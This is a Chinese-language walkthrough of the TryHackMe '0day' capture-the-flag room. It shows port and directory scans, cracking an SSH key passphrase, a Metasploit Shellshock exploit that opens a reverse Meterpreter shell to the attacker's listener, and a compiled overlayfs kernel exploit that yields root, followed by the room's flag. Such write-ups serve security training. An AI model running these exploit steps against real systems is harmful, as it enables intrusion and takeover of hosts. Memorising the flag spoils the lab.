服务扫描
┌──(rootkali)-[~/tryhackme/0day]└─# nmap -sV -Pn -A -O 10.10.209.66 130 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-21 03:52 EDTNmap scan report for 10.10.209.66Host is up (0.28s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)80/tcp open http Apache httpd 2.4.7 ((Ubuntu))|_http-server-header: Apache/2.4.7 (Ubuntu)|_http-title: 0dayAggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 5.4 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel开启了ssh和http服务
爆破目录
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.209.66 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100Error Log: /root/dirsearch/logs/errors-21-10-21_04-07-47.logTarget: http://10.10.209.66 [04:07:48] Starting: [04:07:53] 301 - 311B - /admin -> http://10.10.209.66/admin/ [04:07:54] 200 - 0B - /admin/ [04:07:54] 403 - 294B - /admin/.htaccess[04:07:54] 200 - 0B - /admin/?/login [04:07:54] 200 - 0B - /admin/index.html [04:07:57] 301 - 312B - /backup -> http://10.10.209.66/backup/ [04:07:57] 200 - 2KB - /backup/ [04:07:58] 403 - 287B - /cgi-bin/ [04:07:58] 301 - 313B - /cgi-bin -> http://10.10.209.66/cgi-bin/[04:07:58] 200 - 13B - /cgi-bin/test.cgi [04:07:59] 301 - 309B - /css -> http://10.10.209.66/css/ [04:08:02] 301 - 309B - /img -> http://10.10.209.66/img/ [04:08:02] 200 - 3KB - /index.html [04:08:02] 301 - 308B - /js -> http://10.10.209.66/js/ [04:08:07] 200 - 38B - /robots.txt [04:08:07] 301 - 312B - /secret -> http://10.10.209.66/secret/ [04:08:07] 200 - 109B - /secret/[04:08:07] 403 - 292B - /server-status [04:08:07] 403 - 293B - /server-status/[04:08:09] 200 - 0B - /uploads/ [04:08:09] 301 - 313B - /uploads -> http://10.10.209.66/uploads/在/robots.txt页面受到了作者的讥嘲
You really thought it'd be this easy?
在/backup/目录下找到一个ssh 私钥文件,下载到本地用ssh2john破解失去私钥明码
┌──(rootkali)-[~/tryhackme/0day]└─# /usr/share/john/ssh2john.py id_rsa >rsacrack ┌──(rootkali)-[~/tryhackme/0day]└─# ls id_rsa rsacrack ┌──(rootkali)-[~/tryhackme/0day]└─# john --wordlist=/usr/share/wordlists/rockyou.txt rsacrack Using default input encoding: UTF-8Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashesCost 2 (iteration count) is 1 for all loaded hashesWill run 4 OpenMP threadsNote: This format may emit false positives, so it will keep trying even afterfinding a possible candidate.Press 'q' or Ctrl-C to abort, almost any other key for statusletmein (id_rsa)1g 0:00:00:42 66.85% (ETA: 03:20:21) 0.02373g/s 227710p/s 227710c/s 227710C/s blackcurrent00..blackcow15Session aborted私钥明码是:letmein
所以用户名是什么?找了一圈没找到,难道是兔子洞?
用nikto开掘网站破绽
┌──(rootkali)-[~/tryhackme/0day]└─# nikto -h http://10.10.209.66 - Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 10.10.209.66+ Target Hostname: 10.10.209.66+ Target Port: 80+ Start Time: 2021-10-21 03:54:16 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.7 (Ubuntu)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ Server may leak inodes via ETags, header found with file /, inode: bd1, size: 5ae57bb9a1192, mtime: gzip+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3092: /admin/: This might be interesting...+ OSVDB-3092: /backup/: This might be interesting...+ OSVDB-3268: /css/: Directory indexing found.+ OSVDB-3092: /css/: This might be interesting...+ OSVDB-3268: /img/: Directory indexing found.+ OSVDB-3092: /img/: This might be interesting...+ OSVDB-3092: /secret/: This might be interesting...+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...+ OSVDB-3233: /icons/README: Apache default file found.发现/cgi-bin/test.cgi很可能存在shellshock破绽(版本号CVE-2014-6278)
攻打
在msf里搜寻这个破绽
msf6 > search shellshock 2014-6278Matching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner 1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) 2 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)抉择探测模块scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set targeturi /cgi-bin/test.cgitargeturi => /cgi-bin/test.cgimsf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed探测胜利了!
再次抉择攻打模块multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/test.cgitargeturi => /cgi-bin/test.cgimsf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] Command Stager progress - 100.46% done (1097/1092 bytes)[*] Sending stage (980808 bytes) to 10.10.209.66[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.209.66:33088) at 2021-10-21 04:23:00 -0400meterpreter > shellProcess 1057 created.Channel 1 created.iduid=33(www-data) gid=33(www-data) groups=33(www-data)whoamiwww-data胜利拿到初始shell
在/home/ryan拿到user.txt
提权
查看零碎版本
uname -aLinux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux这个是一个比拟老的linux版本了,因而咱们从内核提权的思路登程
把内核枚举脚本(内核提权枚举脚本举荐linux-exploit-suggester.sh)通过msf传到靶机,枚举内核提权信息,这里列举三个highly probable的提权脚本一个个尝试
[+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ] Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2015-1328] overlayfs Details: http://seclists.org/oss-sec/2015/q2/717 Exposure: highly probable Tags: [ ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic} ],ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} Download URL: https://www.exploit-db.com/download/37292最初37292这个脚本证实能够提权胜利
上传脚本到靶机
meterpreter > upload /root/tryhackme/0day/37292.c ./37292.c[*] uploading : /root/tryhackme/0day/37292.c -> ./37292.c[*] Uploaded -1.00 B of 5.00 KiB (-0.02%): /root/tryhackme/0day/37292.c -> ./37292.c[*] uploaded : /root/tryhackme/0day/37292.c -> ./37292.cmeterpreter > shellProcess 6979 created.Channel 12 created.ls37292.c40611.cbLMlCdirtyc0wfool.txtles.sh在靶机上编译、执行这个攻打脚本。拿到root flag
gcc 37292.c -o ofsls37292.c40611.cbLMlCdirtyc0wfool.txtles.shofschmod +x ofsiduid=33(www-data) gid=33(www-data) groups=33(www-data)./ofsspawning threadsmount #1mount #2child threads done/etc/ld.so.preload createdcreating shared librarysh: 0: can't access tty; job control turned off# iduid=0(root) gid=0(root) groups=0(root),33(www-data)# cat /root/root.txtTHM{g00d_j0b_0day_is_Pleased}